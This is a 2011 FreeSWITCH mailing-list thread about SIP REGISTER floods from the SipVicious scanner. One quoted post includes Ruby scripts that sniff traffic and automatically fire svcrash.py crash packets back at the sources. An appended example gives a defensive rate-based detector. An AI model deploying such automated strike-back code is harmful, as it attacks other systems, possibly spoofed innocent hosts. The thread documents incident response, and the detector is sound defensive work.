That would work until the attacker defines a custom User-Agent string. There have been reports of modified SipVicious code using Asterisk PBX as the agent.<br><br><div class="gmail_quote">On Thu, Apr 21, 2011 at 4:13 AM, Denis Galvao <span dir="ltr"><<a href="mailto:denisgalvao@gmail.com">denisgalvao@gmail.com</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="margin: 0pt 0pt 0pt 0.8ex; border-left: 1px solid rgb(204, 204, 204); padding-left: 1ex;">Nice! Thanks for sharing!<br>
<br>
Denis<br>
<br>
2011/4/20, Peter P GMX <<a href="mailto:Prometheus001@gmx.net">Prometheus001@gmx.net</a>>:<br>
<div><div></div><div class="h5">> Hello all,<br>
><br>
> I would like to share this with you as you may have also been affected<br>
> by this threat.<br>
><br>
> Yesterday we received a SPIT attack to our Freeswitch servers. We had<br>
> about 50 register requests/sec. We noticed this as we saw a slight<br>
> increase in the load of the Freeswitch servers. Fortunately Freeswitch<br>
> can handle a huge amount of register requests so we had no denial of<br>
> service.<br>
><br>
> You can identify this attack by finding the following in the Register<br>
> message:<br>
> User-Agent: friendly-scanner<br>
><br>
> How to get rid of it:<br>
> The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a<br>
> nice tool "svcrash.py" which can send a malformed packet back to the<br>
> attacker which crashes their own Sipvicious tool. You can issue this tool by<br>
> python svcrash.py -d <host of attacker> -p <port of attacker><br>
> You will need port 5060 on your machine to work. But there is also a<br>
> workaround for that. svcrash.py will show how to overcome this if your<br>
> port 5060 is not available.<br>
> Download it here<br>
> <a href="http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz" target="_blank">http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz</a> and<br>
> unpack it to a folder of your choice.<br>
><br>
> I wrote a small Ruby script to send the packet back to a port range, as<br>
> our attacker used some dozens of ports to send.<br>
> Here is the script (Install ruby first by "apt-get install ruby" e.g. on<br>
> Debian based systems). Put it into the sipvicious directory<br>
> kill_ports.rb:<br>
><br>
> #!/usr/bin/env ruby<br>
> host=ARGV[0]<br>
> start_port=ARGV[1].to_i<br>
> end_port=ARGV[2].to_i<br>
> start_port.upto(end_port) do |port|<br>
> cmd="python svcrash.py -d #{host} -p #{port}"<br>
> p cmd<br>
> erg=`#{cmd}`<br>
> p erg<br>
> end<br>
><br>
> You now can run it by<br>
> ./kill_ports.rb <ip> <from_port> <to_port><br>
><br>
> By using this tool we got rid of most of the SPIT messages. But after a<br>
> while they started again to attack us from different ports.<br>
><br>
> The next step is: Why not automate this by trying to identify host and<br>
> port automatically and send back the svcrash.py packet to the sender's port?<br>
><br>
> First install the pcap library<br>
> apt-get install libpcap-dev libpcap-ruby<br>
><br>
> Then I wrote the following tool to automate this, it makes use of the<br>
> kill_ports.rb above:<br>
> strike_back.rb:<br>
><br>
> #!/usr/bin/env ruby<br>
> # I used some code from <a href="http://snippets.dzone.com/posts/show/5931" target="_blank">http://snippets.dzone.com/posts/show/5931</a><br>
> require 'pcaplet'<br>
> require 'logger'<br>
> require 'timeout'<br>
> @timeout=3600 # max runtime: 1 hour<br>
><br>
> @logfile='strike_back.log'<br>
> class AuditLogger < Logger<br>
> def format_message(severity, timestamp, progname, msg)<br>
> puts msg<br>
> "#{msg}\n"<br>
> end<br>
> end<br>
><br>
> logfile = File.open(@logfile, 'a')<br>
> LOGGER = AuditLogger.new(logfile)<br>
> LOGGER.level = Logger::INFO<br>
> search="friendly-scanner"<br>
> puts "Searching for '#{search}' in SIP packets"<br>
> $network = Pcaplet.new('-s 1500')<br>
> $filter = Pcap::Filter.new('udp and dst port 5060', $network.capture)<br>
> $network.add_filter($filter)<br>
> puts "Logfile: #{@logfile}"<br>
> puts "Starting capture..."<br>
> begin<br>
> Timeout.timeout(@timeout) do # 3600 sec<br>
> for p in $network<br>
> header= "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")} #{p.src}:#{p.sport} => #{p.dst}:#{p.dport}"<br>
> if $filter =~ p<br>
> #puts "simple search"<br>
> if p.udp_data.index(search)<br>
> LOGGER.info "Kill Friendly scanner #{p.src} with Source Port #{p.sport}"<br>
> cmd="./kill_ports.rb #{p.src} #{p.sport} #{p.sport}"<br>
> erg=`#{cmd}`<br>
> p erg<br>
> LOGGER.info header<br>
> LOGGER.info p.udp_data<br>
> end<br>
> end<br>
> end<br>
> end<br>
> rescue Timeout::Error<br>
> logfile.flush<br>
> puts "Timeout - finished."<br>
> end<br>
><br>
> There may be a better way to code this, but at least it worked. After<br>
> about 15min the number of attacks went to 0.<br>
><br>
> Disclaimer: You can damage other systems by using these tools. So be<br>
> careful and use at your own risk. Do not use this tool for attacking<br>
> other systems!<br>
><br>
> Best regards<br>
> Peter<br>
><br>
> _______________________________________________<br>
> FreeSWITCH-users mailing list<br>
> <a href="mailto:FreeSWITCH-users@lists.freeswitch.org">FreeSWITCH-users@lists.freeswitch.org</a><br>
> <a href="http://lists.freeswitch.org/mailman/listinfo/freeswitch-users" target="_blank">http://lists.freeswitch.org/mailman/listinfo/freeswitch-users</a><br>
> UNSUBSCRIBE:<a href="http://lists.freeswitch.org/mailman/options/freeswitch-users" target="_blank">http://lists.freeswitch.org/mailman/options/freeswitch-users</a><br>
> <a href="http://www.freeswitch.org" target="_blank">http://www.freeswitch.org</a><br>
><br>
<br>
</div></div><font color="#888888">--<br>
Sent from my mobile phone<br>
</font><div><div></div><div class="h5"><br>
</div></div></blockquote></div><br><br clear="all"><br>-- <br>Kerem Erciyes - Sistem Danismani<br><a href="http://keremerciyes.com" target="_blank">http://keremerciyes.com</a><br><br><br>
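The thread detects the scanner only by its User-Agent header, which the reply above notes is trivial to change. The following detector is an added example (not code from the thread or from FreeSWITCH/SipVicious) that keeps the User-Agent match but pairs it with a per-source REGISTER rate rule, so a flood with a rewritten agent string is still flagged; the class and method names, thresholds and sample packets are all constructed for the example.

```ruby
# Added example (not from the thread): flag SIP REGISTER packets by User-Agent
# AND by per-source rate, so a scanner that rewrites its User-Agent header
# (e.g. to "Asterisk PBX") is still caught. All names/samples are constructed.
class SipRegisterDetector
  # agents: known scanner User-Agent substrings; more than max_per_window
  # REGISTERs from one source IP within window seconds counts as a flood.
  def initialize(agents: ["friendly-scanner"], window: 1.0, max_per_window: 20)
    @agents = agents.map(&:downcase)
    @window = window
    @max = max_per_window
    @seen = Hash.new { |h, k| h[k] = [] } # src ip => REGISTER timestamps
  end

  # Minimal SIP parse: request method from the first line, User-Agent header.
  def parse(payload)
    lines = payload.split(/\r?\n/)
    method = lines.first.to_s.split(" ").first
    ua = nil
    lines.drop(1).each do |line|
      name, value = line.split(":", 2)
      ua = value.strip if name && value && name.strip.casecmp?("user-agent")
    end
    [method, ua]
  end

  # Returns :known_scanner, :register_flood or nil for one packet.
  def classify(time, src_ip, payload)
    method, ua = parse(payload)
    return nil unless method == "REGISTER"
    return :known_scanner if ua && @agents.any? { |a| ua.downcase.include?(a) }
    stamps = @seen[src_ip]
    stamps << time
    stamps.shift while stamps.first < time - @window # forget old entries
    stamps.size > @max ? :register_flood : nil
  end
end

# Constructed sample REGISTER (not a real capture) with a chosen User-Agent.
def build_register(agent)
  "REGISTER sip:pbx.example.net SIP/2.0\r\nVia: SIP/2.0/UDP 203.0.113.7:5060\r\n" \
  "From: <sip:100@pbx.example.net>\r\nTo: <sip:100@pbx.example.net>\r\n" \
  "User-Agent: #{agent}\r\nContent-Length: 0\r\n\r\n"
end

def run_demo
  d = SipRegisterDetector.new
  out = [d.classify(0.0, "203.0.113.7", build_register("friendly-scanner"))]
  # 30 REGISTERs in 0.6 s with a spoofed agent: UA rule misses, rate rule fires
  30.times { |i| out << d.classify(i * 0.02, "198.51.100.9", build_register("Asterisk PBX")) }
  out << d.classify(5.0, "192.0.2.4", build_register("Example Phone/1.0"))
end
```

In a real deployment the rate threshold should sit above the legitimate re-registration peak of your phones, and a hit should feed a firewall block or alert rather than any reply to the sender.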